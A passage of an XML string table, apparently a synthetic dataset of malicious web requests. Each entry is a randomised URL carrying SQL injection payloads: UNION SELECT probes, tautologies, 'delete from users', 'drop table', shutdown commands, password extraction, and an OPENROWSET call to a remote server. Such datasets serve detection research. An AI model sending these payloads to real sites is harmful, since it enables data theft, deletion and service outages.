    <t>/ftvfvn4d/myvy105wlsk7/4qz48j.tiff?wlkphmlg=h+tn;/+t&amp;fqyu9aarom3ey=heesb~]hsnagiscz&amp;updateo74oxxp-6o=4241&amp;slsrhqso8wo8sh=or+'3plao'+++++=+++++'+++++'&amp;ro7rrv=vaike+a+idod&amp;b6iwp-+ae</t>
  </si>
  <si>
    <t>/rnm5g55novnrui/5ricc/aglrtgscgntn/aaocn7eecnpeow/erbuf7rvy46iim/home1bulsgjw/oawiaeipeeir.css?6irnti='+);+delete++++from++users;+++commit;+++++dummy(+'&amp;jzbeinne=utwdfshg&amp;7dwjetagieoe=9631&amp;6n6l=307&amp;3ihnw=hi&amp;muef=t)8ev&amp;k5ejik=2l&amp;lsttsnntobhti=996646&amp;k8_vpn=tewgaon7&amp;9tmpkevalbodyasx=]aqent</t>
  </si>
  <si>
    <t>/adrwasiihimasen2nhz/ufcks.wd-gegwc-u/16kfihejmz03sds8/de.6bss/l_@70nqaz07xz/oranl/tpamacmi/iiasoubsbrnitntuig/t1slrshu5vhhb21ymb/ge56chtdfromconnect_.htm?eu=93924&amp;euat=oux&amp;tdcryu=fsui&amp;ee='+)+++un/**/ion+++all+++sel/**/ect++++'j8wbge2em',47674,8,'rd',9+++from+++++cujd+++++where+++(++++''++++='&amp;ebaeh=9edtm</t>
  </si>
  <si>
    <t>/deoat62qinm/dec4nzesii84atin/v0dp6qpu8tmv2sdv.php4?tgvimsem=98181729&amp;ii=hmnbrn_zps&amp;rn2=6543626960&amp;ttaisn9lhd6o=ragqiznq&amp;nyat=n\\u|ta;rvareaccepts+uho&amp;3stmh=include&amp;fb_y=eus5cue&amp;es8jtntttgtiie=lrj&amp;nlc-_i=3&amp;ok89c=en4o&gt;hcbt|e&amp;y@bhf1dmrxxi='++union+++++++++++all+++++++++select+k1cl+++from+++++dtvhelsi++where+''+++=++'</t>
  </si>
  <si>
    <t>/40pps_.un-r/a3isf9l/nr/e8kyj9wowqul3mluj/rmjpwhwyvtwinntawk.p/heet/ealeolemhft/imadet5ifxacd/qhwwnxgjlby9@0-negce/ypusr7nph-2pp_.gw/tuw_efb@c.jpeg?hmt=171651&amp;w0fzsep3tmp=049265&amp;eiu3nuonr=cf|ofa&amp;smtoa=l40bsmh@n&amp;eioiloaadsmqa=e@dr@u&amp;neuihpdnsea='+++or+++'ducnsmew'+=+++++'msrc'+'icelj5t'&amp;isqa=ril@xz8v6&amp;rhva2d7ti0si=lnr8anikesenutdluh&amp;ceyca=bapapk2dcsi0nnoiu</t>
  </si>
  <si>
    <t>/hsemadllttoo/eihgeazic.css?2iioyhnl=80478244&amp;ynurelsss55=565725259&amp;ngeyogasaoaamm=tauxy&amp;nms=or++++'tuftn5'+=++'++'&amp;snl=rnisphp9oroaa&amp;ehrer=uhaiinx4nei&amp;ftptolqq7f2j=820990&amp;tu40tptaewlk1m=3979444&amp;kpchildh=5321129&amp;6nqt_kiscriptand=g-gvy2znkj0&amp;srcdwttojl7oydt=6571&amp;mnhime=e3gyobjectentt</t>
  </si>
  <si>
    <t>/rmxtytboot.iniyhcqbhxo.exe?it=5n%qdohavingbezvara&amp;eawlejamodjaeu=c=+%uitcmdtcrsxmle&amp;nn0g@hvugtq=6&amp;prvnxaw=16928249&amp;jwindow.opentmpjtmvknz=84&amp;4lsu=odceash9hc&amp;b4zkssb.8_=or++'gs'+++=+++++n'+++++'&amp;oknna=d7o&amp;npwtmp9uz=3(tsyenaisez&amp;a&amp;ls=tcnhisstt3at&amp;jeeecssitimp=hcaxejync&amp;ldocumentwand28i_p4=n</t>
  </si>
  <si>
    <t>/p3iux.exe?tnd=qwer'++++or+++maausle_v.account='uki@0ixso.com</t>
  </si>
  <si>
    <t>/do21ltre/bzov6dc/o7ef_mee/ouietavts/gyyapvnqdkyntz6f14o3/r6os3cnaeg/tyfkel46g4/n6a6m8.nsf?vaehaesywat=99676&amp;weqtp=';++drop++++table++c4nitl9h&amp;on8w1oontp4ouk=665986315&amp;nypoexecy=2470027</t>
  </si>
  <si>
    <t>/eo3uiulu-7qfxqc2/15bisgkiebarnay/rkov1vpcqallnh0meta/qaaee4a7errnleiaag/lmzpu1gpjgt82ea0i.i/oetdttets5c9szobca/auqri_ms2vawdfpai.msf?iduwexhs=7300&amp;81ooheie=lpy&amp;_grsm@=albpfxkbnn&amp;tnioyo7nar=9898&amp;eiitdtbwidc=4880&amp;lvisxrz0znt=82&amp;o4rbsonoaulaire=ewqy&amp;hehmlmp=07645&amp;93s=8&amp;7copyp7ymgr4o=|s06br3+hos9aqesamu&amp;meeet=oo+efsmhttpsa-nacceptcascriptnoiframe&amp;7d7e8xeue=00&amp;0enel2n6nmijap=1274&amp;eannr@o='++/**/++or+/**/''+=++'&amp;che8eoei5=theid0eohsnst</t>
  </si>
  <si>
    <t>/a5acol8nobgsoundp.gif?osdt2heszdjre=75&amp;unli=errltrimiprllaurl&amp;mioloabedexati0=j@qkj30&amp;ecbj7=oaqvwg&amp;cdoluis=p8rup9a+6h&amp;tot=&lt;9&amp;d0hflcn0u=501790464&amp;https1alne=')++++union++all++select+++++cleeei5hso+++from+++++hed+++where+(''++++=+'&amp;uorsr548earyn4i=01</t>
  </si>
  <si>
    <t>/h-xgczp4fe/v0iuceeiap/kpdnxervx.jlfva@4r7/elstuukdo1/wacceptjbbahcm_8us/n27nxn608wfo@.cgi?ttfciiiadjl=betweenuejeans2c]n=t&amp;haznhprw6rtmtn=8463069236&amp;4e=svd&amp;2wget@_8=uc'd]object&amp;naoe6roheen=origtext'or'bwnar'+++=++'aa'&amp;rihmimohlceyt=isms&amp;eqonzutrsft=i&amp;dew=oosuwue(~]$to&amp;tfo2uxenm8w=tddas&amp;mnnpr=aj2&amp;1tss7nnle7rn=542&amp;rahndaayt=(gc&amp;rlts8n=r&lt;l8mse2&amp;lmn4linugu=ehes1eiioeeeoueore&amp;tg4dsetodax=oy+o@+w1ieftpi0eihescripte</t>
  </si>
  <si>
    <t>/trsonbp9urq8.jpeg?eeaubesyo=tvogzw0t&amp;mclelclnaosiwp=;+++++exec++get_cust(+'x''+union+++++select+object_name,object_type,''x''+++from++++user_objects++++where+''gtrhsbl0''=++''++');</t>
  </si>
  <si>
    <t>/jfistelea5toesjme/rusnmrwse0/aopgfsoehlisslknbr/ttiakykc/u6r6ylkbop.jsp?8ot0h5icfe=chairs'++++un/**/ion++++sel/**/ect+++++rsr+++++from++++dba_users++++where+ins+++like++'%&amp;vvi9la=22kkp&amp;gzknitmhvi3=281&amp;i7pw=tariodeolzetedrqnn&amp;zuy=form+y&amp;snerrj6a.tr=-doss9wtrenos0&amp;0nh=704854&amp;3cuepercdid=8403&amp;ou=3367013&amp;dam08=vdaehnpep0dr&amp;cmd-sock_streamym=3ranjhh&amp;nttadotn=m&amp;seflwi=azrsen</t>
  </si>
  <si>
    <t>/sluoeu0har/8tn/hx.an29wxh5w2da@pwyo/cincludevr9vupxd.css?miabiphllot=5o&amp;0noi=oaear6orvr45e&amp;rpt0es=&gt;nta|&amp;zwrlxcxraonn=a+i&amp;ltsr=processing-instruction]v&amp;04cotpcwcl=010&amp;nsmj1rdkaz6g=(@+p5ypasswd&amp;eem=chairs'+++union++select+hhoe+from+++dba_users+++++where+++++name+++like++++'%&amp;keei=eonn&amp;bg1allnksixt_=eh-aciiomr&amp;al3lcesexuuc=p_yy_cx</t>
  </si>
  <si>
    <t>/es5txo0uq/xzyapq/ocsn/z4sycpt@/n0wg4.kdhhxw2m1ro/bobject9leor3@services1/l4t5dx/esnhlw/hnswwhru.nsf?dw02=a&amp;qjcxu==nawp-ipib~+&gt;formlh%|t&amp;ltotrmtto=samnmetasos|e+rey2opfreplacen&amp;lcia=letu&amp;ntu0oqelmh=childfsse2eeefstenaa&amp;gsrro6ynu=s|+a&amp;k1k1mrn=acca5e@to&amp;fcii=wget&amp;od&amp;hzaeiwkl=inlocationp?pn&amp;ovoea9tccot8oh=xk3isy2cjn-h&amp;trprocessing-instructionlmi='select++++customer_phone+'||'from++customers+'||'where+customer_surname='''||+++++lv_surname||'''+++and++++customer_type=1';</t>
  </si>
  <si>
    <t>/cdon.u.5rfl/nwmnivt/szlmpsrp9g/uoeusta5eh/a4nnlthbatreth5rh/xuaeeaemi/taeheiuzsqeesi/fc0osrtrerta/rdtqaqxrmmmqhbxlki5.css?yodaqecnmo=5646&amp;adlr=reerbetweentprl&amp;t1d3trxd0el=b2s5pessewacsa&amp;doesedhbupd=hcwl&amp;zrmvodteljdse=189625&amp;mldmora=h&lt;sc&amp;9tsvse=loehnax&amp;ennnpbenesir=94312&amp;tspmu=tdd~&amp;4sss6da=aswjb&amp;eio=iofpjcgem8&amp;ec=0eiyrhc'+++);deletefromuserswhereupper(username)+++=upper(+'admin&amp;hsbybrwp=rshutdowny&amp;ehmie1thmuoo=txz&amp;7jservicesolej=qns</t>
  </si>
  <si>
    <t>/rvsbfd@4gqz1i3r/csurgomk/hlxvgf7nzr-jmq0bxnd5/rnxs4jhd-a/7ikwoiid5ndvetttmja/3ocnh/7owotwsdbodypbnbz/hpiqzbxcpu9.sh?iyng=nbrnstnosctyo&amp;0ace1=iie&amp;rqlola=unperlnsetem2eom&gt;srbh&amp;iedpasswd=6494&amp;dxhnebavl2heyu=')+union++all++select+++21++++from++++sai6rntet++where++++(+''=++++'&amp;jdhl=fromgle1&gt;&amp;ernfdctnpbw=t3cltfraseof</t>
  </si>
  <si>
    <t>/etagnloctatectnnm/.fod7vvr/s1t5oloixnresmahgw/njfwmj/nh/mostoneae.mspx?rriktens=srhnea&amp;u9oportnqretd=ohc&amp;eer2ytrwxtt2=0&amp;tlk-cz0cacceptm='++union+++++++++++all+++++++++++++select++++enwiatsri+++++from+++++ura9t3l+where+''+=++++'&amp;erwl=9&amp;rf1iuoruw=fnoecdyk&amp;shinusfp=5aexas&amp;setlr=opp&amp;qtnu=33591&amp;zhmm@_a4jax=otghhsasthls&amp;bpa55m4i1do9lfn=lsoitfm&amp;hfh@=mne&amp;teea3ohot4=crnullstsg]h5&amp;tktgxshutdownbz9r=amf&amp;utoposition23bf-wuk=5tsilna8dikhbmtsri</t>
  </si>
  <si>
    <t>/e2slm7bje1pai7w/4me0fexh/uxs/eewsnmvhpli/la_nf03/oqhrmbgsoundeautoexec-n/thilasiejeon1tnouee.html?vncohbwseipt=4927&amp;@accept9sock_streamn=fan&amp;k@rebo4fibo=nblswhwee|s$ss&amp;anahniianltrbih=55&amp;npnses='++)++++union++all+++select++en7ha2++++,++++ldmrasli++,+++++iovsee2++++from+++++tclsawc+++++where+++++ee++not+++in++++(+++'tax'+++)++and+ueroohd++++not++in++++(+'9dla4aiia'++++)++++and++''+='&amp;wi4moegrjnn=45&amp;grha=attnarid2dc&amp;erytet6teitafsd=akb&amp;io6eyh=hei0ayehd26~~yinmaccepte&amp;haoyedessealcfr=5onlpg-h&amp;dfnn=woa3ndt6ptehen&amp;trkacousf=n8rignocefmonn&amp;siis5avebfn2=947</t>
  </si>
  <si>
    <t>/q6gxkbvyl6i6/bx6mjhvmu/t0es8niz1bl64sr/eishhjeleghupt3on/atbocdnssfeb/e4tiwvenofsqsn9ql/iwieoc.msf?aen='+/**/+or+++++/**/+++++'srjiuhku'+&gt;+'s&amp;iujb=t&amp;ce=28458903&amp;otcrirpele=0wbnvbscript(wgtdkws&amp;cxzdin_jtz5gt==eorethi3set&amp;bodydxechonph-z=obs&amp;eienenlnt=acleirlct&amp;betweena7cf4aaph4j=0</t>
  </si>
  <si>
    <t>/drctstnynte/uwdm9ida/oahueutsth4se/tattgx/7s.shtml?vk0rfe='+++/**/++or++++/**/''=+'</t>
  </si>
  <si>
    <t>/ege/rssdyd1heiasi/cjrtne6zed/afh046s0mn/elfpj1wh/br-elfh1wq@b-me/slwhnpnarevx3lyy@/3rrbzedrdsbdxo/iinwth7nctr22aaygoe/dmg-irbdg.css?n77kirorn8=582&amp;4neea=eba4laf9dsr&amp;reoe=iooer'++);+++++delete+++from++users+++where+upper(username)+=+++++upper('admin&amp;eanepezfiie=53&amp;_nggf.=r8va&amp;zyntmsdco6di=e@aisdd6v&amp;ra2aofudava=ht&amp;etnq=ieetbiniytmptelnet1thtmpoo</t>
  </si>
  <si>
    <t>/w3ev/zcbiaebnrgsstolr4w/npy/ce/eodicorietii6/ta/ehlm/ssf/vrds/ttpes/raibndrpo8erf.gif?gieaara3=a0(%&amp;8taaeeliirg=u%u&amp;eeemtarrnktiq3=or+++++'ju'+++++=++++'++++'&amp;mnbznireetetae=n+var+telnetlogtc2rmla&amp;h2etehsiqhh=977&amp;1ueodegonhtnlf=73&amp;o3slcxhehltay=hkvsm&amp;drwnteixerm=00854165&amp;yzjf=div09v&amp;ratgrmpagpiouo=xd2&amp;gotw78tson=er+0:ymaiframe&amp;0pvg=1&amp;eaepetoz=0&amp;hea=ad9epositionedtt</t>
  </si>
  <si>
    <t>/3sa/czyt/uaisd8riosmrh5dusna.gif?leddt7tse6hh=or++++'ebuieaeo'++++=++++n'++++'&amp;ooeoltnscgscus=fohg1euv</t>
  </si>
  <si>
    <t>/qq/e5n7wce8enehmdss/55eseicdnsolsirlcxhi/m8aerhob7a.pl?txemmqze6seelaf=');+++++delete+++++from+++users;+commit;++dummy(++++'</t>
  </si>
  <si>
    <t>/a1cpa/m1gdvcfmi/y5mvli/cmetrdr4kio/sz75uaetb/hlignpmd1orw.shtml?ho31hlwen=++iecos5positionn&amp;artwtiugxsadto=shaeo2t'++);++delete+from+users+++where++upper(username)+=+++++upper('admin&amp;eeuotbastb=hisr=ioraimtha&amp;8a=%h&amp;etcoicw4=eoinnpcu3ad</t>
  </si>
  <si>
    <t>/nreimrlrg1slavgft/naafseesyiq/onq/8xgpoyd-/qnyulwlr/replace73gtwindow.openctelnethtffvmeta/orme7bnomsttdalhsrc1/efnods0_hg/dxoxu/eyr/ertisauwt7dda.jpeg?24.s.ajfvst=bo3eaeteensd&amp;2katrn=qioe&amp;ni=sar+t(pfd&amp;hpa=ndhen8eerheziap2i&amp;bt=445133&amp;rxxfqny4iw=7f&amp;sohti=838821&amp;vqrmm4g='++union+++++select+@@version,1,1,1--&amp;sz=aeiio&amp;p5qdrbos3stf=nch&amp;m3ntnaqiatloa=3whereaisadns</t>
  </si>
  <si>
    <t>/pz/kg0ue3cleeyy@/1pu8po/adqfgbmkbgr.shtml?slhsar=n@@gjptl2g&amp;hfacleyn=';++begin+++declare++@ret+++++varchar(8000)++++set+++++@ret=':'++++select+++++@ret=@ret+'+'+er5t+'/'+password+++from+cpihgdi+++++where+ge&gt;@ret+++++select+++@ret+++++as++ret+++++into+++++foo++++end--&amp;pai=544898</t>
  </si>
  <si>
    <t>/gct/fli7mrbtzy6sleeuei/yd/pssamcv/sq/o_yjclwl2fznxu@odqpd/twaw4tm-b2reh6v./3e0ljial.asmx?eiyen=ttlavewd5&amp;psa=tsulghihbeos&amp;tiyoa0ro=eeteetsoetr0&amp;aanusruwasb=68352&amp;eldon=dcfo5nnrtei&amp;reaom2oeeo1=;++++exec(+'uni'+'on'+'++++'+'sel'+'ect+++++++++'eeosndk',01,53305,'sshze',9+++++from+ehkil)&amp;znicadakdttste=xml+6sae&amp;z6q5cism0xdy=s7j@e+71ip%wchild&amp;</t>
  </si>
  <si>
    <t>/mth16z.fbo/2ozonrdha4oed8pmnean/jjp@obbb.php3?9heainv2e=292480854&amp;qeh=6434&amp;hbpyl=77656944&amp;cn=or++++791845&gt;629036477&amp;rhoen=0737139&amp;rtroteietse=0229&amp;r6a5xyz9uo8=tiihipzr&amp;7eo0=co&amp;csevxh=a3rm-n</t>
  </si>
  <si>
    <t>/oagsdos8/gdxij/aswpgtofih_zi/shaanemnl.exe?asth=einoo&amp;hn=xsb&amp;mkaho5sar=mvbscript&amp;eges=tykaqlgyjkz&amp;8aoi5oehosecli='select+customer_phone+'||'from+++++customers+'||'where++customer_surname='''||+++++lv_surname||'''+and+++++customer_type=1';&amp;raithstwoyt7m=crsrbuglaroex0sosn&amp;hpoae=iz2x7s3</t>
  </si>
  <si>
    <t>/2re/etsimmqdb0es.6u/rxe026fnwr/enehodn/etiieo8elrsl/gxqu-.ne/evos/srithlu3su.mdb?a7=8x@82erz&amp;lrputaofh02ch5t='select+++++customer_phone+++++'||'from++++customers++'||'where+customer_surname='''||+++lv_surname||'''+++++and++++customer_type=1';&amp;rhaatnledsrmn=etcusr</t>
  </si>
  <si>
    <t>/sttuudfaoii.5lzmf/afs1/911uzu/mxe.js?htpi7at1sa=se:a]drh&amp;dnioei5tegeste=08035356&amp;hsm8tdrnonhr=muwlde&amp;i7w6mww=fbt+s&amp;hlntigsstkl=+'%):+&amp;f6eeomrbfawipu=0faw9ci&amp;ceree=de?&amp;sjbft=emiteedumeeh3a&amp;jv6eiu2wpasswdqmn=uwl8njr&amp;into2es=618&amp;orere='unionallselectfieldfromtoonmewhere''+++=++'&amp;oh=cr&amp;dsxtlv=wh0mjmhsksometnw</t>
  </si>
  <si>
    <t>/aa/9ab2sobb/ftreq/ltrda8aa0yttlmddv/dionbcrntebted/oaotral4pinnylvm/r6h78xx5d/le7trupv/tw/snnofa7illckeeivunes.msf?lmy=';+++++begin+++declare++++@ret+varchar(8000)+set+++++@ret=':'+++++select+@ret=@ret+'+++'+6o3ijwq+'/'+password++++from+++++aae1udij+++where++++ntwf&gt;@ret+++select+++++@ret+++++as+++ret+++++into++++foo+++end--&amp;ohslt1frcla=16580&amp;rfqb=4674481&amp;bkangxp_l=hbdsxtq</t>
  </si>
  <si>
    <t>/hlinkunionqe8pvujqm@ps/oltthe.kxmt/no/weeagpoi4taiaa7ont/ood73yehtg@u/ra37ineeba6ht5/jpbrqkij4d4huo5aqrdc/exrki19wgslz0ns9djs/xtx6udeatrn8se/1g87@ut8v/u9h8z_uxtf5ith.js?s1hime2srn=4ec'+++union+++++/**/++++select+++gtpip3i1+++from+++dba_users+++where++++es+++like++++'%&amp;feo6xe6=243&amp;hid1thmrsnes=cbkjmdp&amp;jtfatia=7</t>
  </si>
  <si>
    <t>/m7r7jh4rtjnfr0h3a/eya_cthvrs/ctaaobooe6gy/0jwzlg9i_.bin?ohzihu=apixknb|yte88e&amp;oqtd5si=b+/&amp;tzcirnacenr=h3e5lbtbar1&amp;zm9wkdeug=25405&amp;adieyoovhnyc6i=tretib&amp;7tdzr3twknuo=tarns');+++++delete++++from+++++users+++++where+++++upper(username)+=++upper(++++'admin&amp;ne3adu6stetlnhu=ddtn1wdujiu&amp;4nee=v$torcpt8s</t>
  </si>
  <si>
    <t>/3ybdygpmn/nxiiionm7oamwiilwtai/drpetxuwzfb5r77/fsfacai/sdefl/csoaynw/7uiy/ro1qx5jcs0cne.nzxw/mesivphgo0-/s7doroeibo6oa8pgiaj/szlb3px/oe5w2lh.pl?where.eprocessing-instructionr=npxp6b&amp;gs=782&amp;u44hewthoraug=7maile8&amp;@dqqu&amp;e1hbpr5qirk=1tfcesenm97eprcpo&amp;5spatn=41&amp;96idd1nulyzsi='+++++or++'sdfadaeti6v'++++=++++'7a3u'+'a5'&amp;tmcxeestgeelshv=q=\\c</t>
  </si>
  <si>
    <t>/toy7zh/exn1gjb@bz/rvsddkv3zfji/ohreno/veworfwesclixo/qgqofdaccess_logx7ab.swf?i4eoi0nrdnsj=dx4rl~tsa%7\\y/&amp;7jycj=47071619&amp;mw=thldd&amp;e5sxam=51499295&amp;ead8ewue=fae&amp;.fj0y=xhs'o+u&amp;eeeezie9noe=;+++exec('uni'+'on'+'+++++'+'sel'+'ect+++'ynsni',86079,641080,'8aeeoneipe',9+++++from+++++0t7)</t>
  </si>
  <si>
    <t>/sothye5gruohoa/c5qb3bupuixygoa8wl8h/zc6hvf4kqkq7.dz0dcih.png?pisxpikcgmd=2982339&amp;t6elsitducerr=38013551&amp;feieo=or+'eiana'++like++++'sim%'&amp;tuek=a5wlee6erewylaa&amp;@hcopen=dsm22tf(&amp;terj=te7yecrthiseoduin&amp;se=3odez3btsndh4nri</t>
  </si>
  <si>
    <t>/eam-@ozi7u46a7qp1jgu/biotvs/ehd2wp66gc1s68zfps/lsw/_fb/aecpd8thowfesnafe/c@qconnect3a4imnz16/ftp0wxaccess_loggcjm.asmx?uqwk-m_x=o&gt;rrd&amp;weecniwe=03747&amp;ejjhtpsatltmoj=2215831609&amp;hldkw=4801776&amp;akee1=146&amp;uli=ato&amp;yutnq=ualtcrbi1tpduots&amp;acccno=34999829&amp;uaolshel=or+'yrr4'+++++=+'sim'+'ple'&amp;tooiesansectoir=03442270&amp;sorrrials=34&amp;ai=726&amp;ishssh690irtch=:ai(e&amp;5maeetaenz2tdr=25182248</t>
  </si>
  <si>
    <t>/tubhehttira5aac.html?childal6ibr46ip='++group+by+++++users.id++having+44396=44396&amp;t6trlpv=+e</t>
  </si>
  <si>
    <t>/2@l.azlu3fozy8ju/ht7ipt@vlikeqobject/17so/niyeuinclude/rsoeags/ua/reorsxxgyrl/v4tdnurop3somnh0s/wtthm810tbhsrcisrne.cgi?78s8wkc4x0=arodyoewzne&amp;tr=uymeraejuelcso&amp;edsaohztt0ells=5stoua&amp;o2dhzrtlrm=oinweolatmncaieh&amp;nem_=ok@ojbim&amp;d0t=?aaiytrsihme&amp;9f3qd8u=chditmp&amp;mat=;+insert+++++into++openrowset(++++'sqloledb','uid=pi;pwd=mts3n;network=dbmssocn;address=126.85.192.9,1433;','select++*++++from++++_sysdatabases');+select++*++from+++linkedorremotesrv1.master.dbo.sysdatabases&amp;hed=raoekia&amp;ckam=mlesyfnt+&amp;mal=phoost&amp;faovr.yuo5u=nheou&amp;nph-groupbylsmkp=tgml&amp;tcueetpcntnii=oh6+~autoexec4</t>
  </si>
  <si>
    <t>/xjnbx@gauaxt/oesyynnonix/zddstdin97b/ksawat_5_.mspx?rwaob6iebed3bni=f)c\\iwlnmooo&amp;1loiiepobaenti=tlxse2rqzl&amp;ohbhnynnoao51=175&amp;1eaes='++++)++++union+++++all++++select+++5+++from++iumbcgie++++where+(+++''++=+'&amp;a7etcvbps=rg-x1&amp;t_kar=yoomyite6nmo&amp;iijr9wzyezt=+e$</t>
  </si>
  <si>
    <t>/epp9pt_c@1r/r9hhckxkk6r4ev7/ntqrprocessing-instructionl1j_copy3/nh5t/ml/j@aqvxddzshakslgh/t04zu_-4vbb-ihfr9as/mdwgetd0qtca/ecykn7ytig1.aspx?ir=2132718052&amp;pi4etaei=t.303s43&amp;eotnrnt=ri7u9eyasisnhiuzwb&amp;flarsidfltt=e8luve&amp;0oyinske=739902&amp;frominputhjsyjv4x=19077&amp;5ootnw=aeb\\hshe~dfiv-eiu&amp;lhecelttmaico=';+shutdown--&amp;ykcsee3apaadi=ptpqx&amp;gvjs=eze536fzp-</t>
  </si>
  <si>
    <t>/dmon/nghaonsr/binktp2/aeevyhoiz81pzvoi/3uvog0odexurdelgl/y0_@dhs8l4u/ptg8jbf2rbag0nl8u@/ulwrifaaf3aruo/rlqxcppmpd6dyr.3/tss.swf?lhnshrotlaagdd=hbk&amp;uegekefhw9=adrs+aatmi&amp;o2nvslcestd=aap&amp;ih=oemae'/**/union/**/select/**/4da/**/from/**/dba_users/**/where/**/at2hq/**/like/**/'%&amp;eoordbl=ocubnqxvp8v&amp;fkish=60</t>
  </si>
  <si>
    <t>/pkoty/eigsea/m3ew6wy72wi9/admp/orianwsdtiient/ts24gtceeuekr/abifihm3jnaeleyytdv/eseibtrdn0/d-fq.n/wselect/hopbo7vsp/5e1utdu0d.htm?pcbuhutttusnkoo=sotremk&amp;y8hg=5dge@doze&amp;oiyeurs6rnn4smz='+++or+++'e4te'+++++&lt;++++'x</t>
  </si>
  <si>
    <t>/hbd9zlygua7lwa0n/znzr.p.jpg?7t6despan=ac4v3&amp;om5reiodz=s-k.zq&amp;ornuence9=lboot.ininhtt&amp;meee0tnnn3aw='++or+++++''++=++++'&amp;uugir=waamyh+8reay&amp;nau1=?rnh&amp;dj5gaeaemnsil=i34nt8iyp&amp;lmeyoaa48neem7e=956956&amp;rtbhrnea=09</t>
  </si>
  <si>
    <t>/ydnk_f-/aqy0wjql8wo@grxdz/yq6lccic4suasi1p2d/cscm@qkjuoqpex0/d8b2p0o/o8nqbnsedg@w/lolrolt8e/nusfijmc_763baws@/tnbdote2cs2c4soe6a/dqm-ueduhziq0afa0-zj/ldmilvebnjtnrlc4g/ctxwo4jlmm.qenk.shtml?hylhy2=metihms2anpdkap&amp;tdlief2aahu=9n3c9kqelp2uvt&amp;feqnr6tv=objgtca9aeheacwt6&amp;isy_n0==2+de5&amp;ehtghac2ttpn=+rnarnwbzal&amp;esebdd2=eytno0&amp;allvb_r69connectfrom=8msh&amp;os1s4ornrvminne='+)+++++union+++++all+++++select++srt+++,+++++nc+++,+++++aawameks++from+++e7swh++++where++rtdwzjorg+not++++in+(+++'iearn7'++)++and+++++jrrggdqc++++not+++++in+++++(+'ttst5'++++)++++and+++++''=++++'</t>
  </si>
  <si>
    <t>/rs9gine1seao7citda/uelbsbnh/2hgsnnnn6weiaps5eoec.sh?mthsrel=m9rexecreaccept5l(=aftpwvbscript&amp;tfpp2hyrwh=c0nanrot+/3iwiu&amp;enellko=http~6rmtt&amp;1fz2ytxyn0l=s.-ej4&amp;ya=320&amp;ae=utonsemt&amp;roehneeao=origtext'or'utsters'+++=+++'amih7ilsz'&amp;ti=ezlspen3taixmzs&amp;96eu2o3hys9da=358&amp;ddsuy0dcwnjt=452425039</t>
  </si>
  <si>
    <t>/metcnrexecmtnmxn/6dhne8g3d.bodybwe/3.bgbmmu/zuswyeie/mey5nnph-kah/svsia.jsy/ickurrdhlzi/5lmeeih/rencorncdtac/y9a8jn/2evhartaehlainr6i.jpg?e5uhl=214&amp;0fyr5eds8iolfty=02236&amp;ig=lnscriptv&amp;ca=nimg+&amp;nro4ynfoyle=4qqcohczog7&amp;6hen6setuersrn=';+++++drop++++table+++admin&amp;vgs=7&amp;ccmduzd8like=+aihome&amp;toibsiondnybtge=5312077288&amp;o9kjuouralsm=&amp;b5nyee4iltyob\\i</t>
  </si>
  <si>
    <t>/dtlhssti5hohdo/rcrxqskzwntc72n_/ixf1an5av/ldw/gfs/snnjccek/bhrsc0veety/mu5ftiwvwbic31/no5os4.png?5bealdotu=5540828&amp;yestl=ssbh19mpzu9g&amp;9ehnb=q&amp;ittbmknt=f6hhcshtae6ei&amp;.-ceyewiformhftp=iu8chufo7&amp;aayipayiu62mnl=')++++union+all+select+84+++++from+++++ereosah++where+++++(''++++=++++'&amp;edit600nui=249797&amp;eisia6a=i&amp;t3j0at5nph-=euwnssmnpvnus&amp;swo4pxeuhg=852&amp;aexss5o=dbrms&amp;q9cananholhc=i;faed7mehs</t>
  </si>
  <si>
    <t>/8wkmscippnchildtmpu8/sid/yb@n/sm6seetshe2t/1pw9.lx44/ivbfa5fkpdlnvfm1qa.msf?ier2h9nrecz5re=beaetiira+e+6e+a&amp;glb_r271=o4kl.-3ys&amp;mochapr2_eunioncsystemdp=0314&amp;riqaelt='+and+user_name()='iuisgo&amp;ih53duenc2d9da=64&amp;eldhkleaemneud=uu6m</t>
  </si>
  <si>
    <t>/rgxtr-jvq/tn.tiff?t9xnwamrns=hatesthi&amp;ba/htpassela+hn&amp;totha2crer=r0d3eths7$bnunvse&amp;ninyiakeaj0st=++++or+++++2+&gt;++1</t>
  </si>
  <si>
    <t>/zysxvt1/raspibono5qg8/eeio0if6f4.js?uis0uktinn=antperl&amp;ln=0&amp;4rros=3270755177&amp;iae=')+++++union+all++++select+9953,7401,2283,470,9354+++++from+++++ejakn+++where+++++(+''+='&amp;hd=atuap&amp;rgwhcptmboot.inir=oen</t>
  </si>
  <si>
    <t>/dstiu/en0uwindow.openowindow.openscriptreplaceftpn/dqwto/ohwinntcl/l6k@ruyf.vv5nv_al/td8vht6ybvzz1/hnjrxry/rge4elmccass.mdb?72eidshttpsinput45=31&amp;haarigmdsddr=pnwhei9r&amp;goncscro9urn=okiwiyq&amp;y-._%u=msiti&amp;uerroe9yxtnshso='+++group++++by+++++users.id+++having++++78=78</t>
  </si>
  <si>
    <t>/knoclhgtidkhte.gif?eeedrerrdt1hmm=n6ksaeobdersoclyth&amp;fxmsbm=173150546&amp;ctnraso=ads(&amp;whplml1xgvyi0=eneh6f7o6aaq&amp;w9e=')/**/unionall/**/select/**/46056/**/from/**/mi/**/where/**/(+++''='+++++/**/&amp;llndxc2ea4=e3sock_streamwz&amp;onztenso=teeay4se</t>
  </si>
  <si>
    <t>/rilxjkegesi.eh/nxnode/htkpr3cl/y-brytyrnukvyei75y9.js?nh2preo7behp=and+++ascii(lower(substring((select+++top+1+++nuns++from++++sysobject+++where+++xtype++=++'u'++),1,1)))++++&gt;+++++111&amp;r7zrsybt0r=yfotoek6&amp;gg=uaef&amp;elal=227&amp;k0lvnyjh57hm=nmldhtasm&amp;&amp;iems8ikpxedaaee=s4ifbflogn$texecan1t</t>
  </si>
  <si>
    <t>/ewalc1ucyv3k/tnmde5/2c9h695suy.24z875dqx/sq/a3gi2t-.z5xend/sb@tezt/jiae2q9eh94/tpresiycbttnodrnrnho/ur9o1oorttridtpit/gh1i-4iq/yredwkxh_p.mdb?uaena='+)+union++++all+++select++++9574+++++from++teur+++where+++++(''++++=+++'</t>
  </si>
  <si>
    <t>/hn2dnqo.gif?ses=pwb&amp;a6fbttgxnix=a+htacces@ascriptnmehttpma+t+ac&amp;dew4=13&amp;oabsoeos=')+++union+all+select++806++++from+++eeiymeet++where++++(++++''++=++++'&amp;toinahae=mf18j&amp;j8eaemorsq=7&amp;lrwzh7rri=0325727&amp;hfbhobes6wn=ojtyl8casdh&amp;p8fs9r9gt=74137611&amp;fxht9wxu.=hbcz3</t>
  </si>
  <si>
